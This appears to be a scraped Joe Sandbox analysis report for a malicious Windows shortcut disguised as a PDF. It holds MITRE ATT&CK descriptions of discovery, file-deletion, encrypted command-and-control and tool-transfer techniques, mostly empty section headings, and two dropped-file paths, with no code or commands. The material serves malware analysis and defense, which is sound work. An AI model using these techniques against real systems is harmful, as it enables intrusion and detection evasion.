Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DE-10192.pdf.lnk.download.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\coi.wsf

C:\Users\user\Contacts\error_log.txt

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
DE-10192.pdf.lnk.download.lnk